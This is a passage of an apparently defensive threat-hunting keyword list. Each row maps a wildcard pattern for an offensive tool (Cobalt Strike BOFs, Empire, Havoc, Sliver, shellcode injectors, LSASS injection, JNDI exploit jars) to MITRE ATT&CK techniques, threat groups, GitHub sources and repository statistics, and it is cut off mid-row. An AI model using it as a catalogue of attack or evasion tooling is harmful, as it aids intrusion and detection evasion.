T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/boku7/injectEtwBypass,1,1,N/A,10,10,253,54,2021-09-28T19:09:38Z,2021-09-21T23:06:42Z -*inject-etw-bypass*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,0,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*injectify*,offensive_tool_keyword,injectify,Perform advanced MiTM attacks on websites with ease.,T1557.001 - T1190 - T1071.001 - T1056.001,TA0001 - TA0002 - TA0007,N/A,N/A,Sniffing & Spoofing,https://github.com/samdenty/injectify,1,0,N/A,N/A,7,650,122,2022-07-20T15:02:37Z,2017-11-06T17:01:50Z -*Injection* -ProcName lsass*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,Invoke-PSInject.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Injection\Spawn32*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*Injection\Spawn64*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*Injection-Exploit-1.0-SNAPSHOT-all.jar*,offensive_tool_keyword,POC,JNDI-Injection-Exploit is a tool for generating workable JNDI links and provide background services by starting RMI server. LDAP server and HTTP server. Using this tool allows you get JNDI links. you can insert these links into your POC to test vulnerability.,T1190 - T1133 - T1595 - T1132 - T1046 - T1041,TA0009 - TA0003 - TA0002 - TA0007 - TA0008 - TA0001,N/A,N/A,Exploitation tools,https://github.com/welk1n/JNDI-Injection-Exploit,1,1,N/A,N/A,10,2331,715,2023-03-22T21:23:32Z,2019-10-10T01:53:49Z -*Injections/Traversal.txt*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,1,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -*Injections/XSS.txt*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,1,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -*Inject-LocalShellcode*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*InjectMate.py*,offensive_tool_keyword,burpsuite,Multi-tabbed extension that helps generate payloads for various purposes (XSS. SQLi. Header injection. and more).,T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574,TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,Network Exploitation tools,https://github.com/laconicwolf/burp-extensions,1,1,N/A,N/A,2,136,34,2019-04-08T00:49:45Z,2018-03-23T16:05:01Z -*InjectMateCommunity.py*,offensive_tool_keyword,burpsuite,A collection of scripts to extend Burp Suite,T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574,TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,Network Exploitation tools,https://github.com/laconicwolf/burp-extensions,1,1,N/A,N/A,2,136,34,2019-04-08T00:49:45Z,2018-03-23T16:05:01Z -*Injector.exe*,offensive_tool_keyword,POC,POC to check for CVE-2020-0796 / SMBGhost Expected outcome: cmd.exe launched with system access,T1210.001 - T1213 - T1212 - T1201,TA0007 - TA0002,N/A,N/A,Exploitation tools,https://github.com/ZecOps/CVE-2020-0796-LPE-POC,1,1,N/A,N/A,3,242,90,2020-04-02T08:01:38Z,2020-03-30T16:06:50Z -*injector.ps1*.kirbi*,offensive_tool_keyword,PowershellKerberos,Some scripts to abuse kerberos using Powershell,T1558.003 - T1558.004 - T1059.001,TA0006 - TA0002,N/A,N/A,Exploitation Tools,https://github.com/MzHmO/PowershellKerberos,1,0,N/A,9,3,262,37,2023-07-27T09:53:47Z,2023-04-22T19:16:52Z -*InjectPERemote.cs*,offensive_tool_keyword,WheresMyImplant,A Bring Your Own Land Toolkit that Doubles as a WMI Provider,T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071,TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/0xbadjuju/WheresMyImplant,1,1,N/A,10,10,286,66,2018-10-31T16:56:51Z,2017-09-22T19:40:40Z -*InjectPEWMIFSRemote*,offensive_tool_keyword,WheresMyImplant,A Bring Your Own Land Toolkit that Doubles as a WMI Provider,T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071,TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/0xbadjuju/WheresMyImplant,1,0,N/A,10,10,286,66,2018-10-31T16:56:51Z,2017-09-22T19:40:40Z -*InjectProc*,offensive_tool_keyword,InjectProc,Process injection is a very popular method to hide malicious behavior of code and are heavily used by malware authors.There are several techniques. which are commonly used: DLL injection. process replacement (a.k.a process hollowing). hook injection and APC injection.,T1055 - T1055.012 - T1055.001 - T1055.003,TA0002 - TA0003 - TA0004 - TA0008,N/A,N/A,POST Exploitation tools,https://github.com/secrary/InjectProc,1,0,N/A,N/A,10,981,225,2019-02-10T11:05:15Z,2017-05-26T08:08:20Z -*injectremote.boo*,offensive_tool_keyword,silenttrinity,SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.,T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018,TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ,N/A,N/A,POST Exploitation tools,https://github.com/byt3bl33d3r/SILENTTRINITY,1,1,N/A,N/A,10,2070,413,2023-07-08T19:10:18Z,2018-09-25T15:17:30Z -*Inject-RemoteShellcode*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*inject-shellcode *,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*injectShellcode*,offensive_tool_keyword,C2 related tools,Thread Stack Spoofing - PoC for an advanced In-Memory evasion technique allowing to better hide injected shellcode's memory allocation from scanners and analysts.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/mgeeky/ThreadStackSpoofer,1,1,N/A,10,10,875,158,2022-06-17T18:06:35Z,2021-09-26T22:48:17Z -*InjectShellcode*,offensive_tool_keyword,cobaltstrike,Collection of Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/ajpc500/BOFs,1,1,N/A,10,10,475,115,2022-11-01T14:51:07Z,2020-12-19T11:21:40Z -*InjectShellCode.cs*,offensive_tool_keyword,WheresMyImplant,A Bring Your Own Land Toolkit that Doubles as a WMI Provider,T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071,TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/0xbadjuju/WheresMyImplant,1,1,N/A,10,10,286,66,2018-10-31T16:56:51Z,2017-09-22T19:40:40Z -*InjectShellCodeRemote.cs*,offensive_tool_keyword,WheresMyImplant,A Bring Your Own Land Toolkit that Doubles as a WMI Provider,T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071,TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/0xbadjuju/WheresMyImplant,1,1,N/A,10,10,286,66,2018-10-31T16:56:51Z,2017-09-22T19:40:40Z -*InjectShellCodeWMIFSB64*,offensive_tool_keyword,WheresMyImplant,A Bring Your Own Land Toolkit that Doubles as a WMI Provider,T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071,TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/0xbadjuju/WheresMyImplant,1,0,N/A,10,10,286,66,2018-10-31T16:56:51Z,2017-09-22T19:40:40Z -*injectsu.dll*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*inligpkjkhbpifecbdjhmdpcfhnlelja*,greyware_tool_keyword,Free One Touch VPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*inline_assembly -Assembly *,offensive_tool_keyword,mythic,A .NET Framework 4.0 Windows Agent,T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Apollo/,1,0,N/A,10,10,401,83,2023-08-17T14:46:04Z,2020-11-09T08:05:16Z -*inlineAssembly*/execmethod*,offensive_tool_keyword,HardHatC2,A C# Command & Control framework,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/DragoQCC/HardHatC2,1,1,N/A,10,10,825,133,2023-09-06T05:17:05Z,2022-12-08T19:40:47Z -*inlineDll*/dll*,offensive_tool_keyword,HardHatC2,A C# Command & Control framework,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/DragoQCC/HardHatC2,1,1,N/A,10,10,825,133,2023-09-06T05:17:05Z,2022-12-08T19:40:47Z -*inline-exec.py*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,1,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*inline-execute *,offensive_tool_keyword,cobaltstrike,Various Cobalt Strike BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rvrsh3ll/BOF_Collection,1,0,N/A,10,10,480,49,2022-10-16T13:57:18Z,2020-07-16T18:24:55Z -*inline-execute *.o*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,0,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -*inline-execute *tokenprivileges.o*,offensive_tool_keyword,PrivKit,PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.,T1548.002 - T1059.003 - T1027.002,TA0005,N/A,N/A,Privilege Escalation,https://github.com/mertdas/PrivKit,1,0,N/A,9,3,265,35,2023-03-23T09:50:09Z,2023-03-20T04:19:40Z -*inline-execute StartWebClientSvc.x64.o*,offensive_tool_keyword,NTLMRelay2Self,An other No-Fix LPE - NTLMRelay2Self over HTTP (Webdav).,T1078 - T1078.004 - T1557 - T1557.001 - T1068,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/med0x2e/NTLMRelay2Self,1,0,N/A,10,4,349,45,2022-04-30T19:02:06Z,2022-04-30T10:05:02Z -*inline-execute*whereami.x64*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Beacon Object File (BOF) that uses handwritten shellcode to return the process Environment strings without touching any DLL's.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/boku7/whereami,1,1,N/A,10,10,152,27,2023-03-13T15:56:38Z,2021-08-19T22:32:34Z -*inlineExecute.nim*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,1,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -*InlineExecute-Assembly*,offensive_tool_keyword,cobaltstrike,InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/anthemtotheego/InlineExecute-Assembly,1,1,N/A,10,10,490,114,2023-07-22T23:25:15Z,2021-07-08T17:40:07Z -*InlineShellcode*,offensive_tool_keyword,HardHatC2,A C# Command & Control framework,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/DragoQCC/HardHatC2,1,1,N/A,10,10,825,133,2023-09-06T05:17:05Z,2022-12-08T19:40:47Z -*InlineWhispers.py*,offensive_tool_keyword,cobaltstrike,Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF),T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/outflanknl/InlineWhispers,1,1,N/A,10,10,286,42,2021-11-09T15:39:27Z,2020-12-25T16:52:50Z -*InlineWhispers2*,offensive_tool_keyword,cobaltstrike,Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF) via Syswhispers2,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Sh0ckFR/InlineWhispers2,1,1,N/A,10,10,172,29,2022-07-21T08:40:05Z,2021-11-16T12:47:35Z -*Input line too long.*,greyware_tool_keyword,vsftpd,Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts,T1071.004 - T1078.004,TA0011 - TA0006,N/A,N/A,Exploitation Tools,https://github.com/dagwieers/vsftpd/,1,0,greyware tool - risks of False positive !,N/A,1,47,66,2020-11-10T13:07:55Z,2013-06-13T10:11:54Z -*input/shellcode_enc_raw.txt*,offensive_tool_keyword,avet,AVET is an 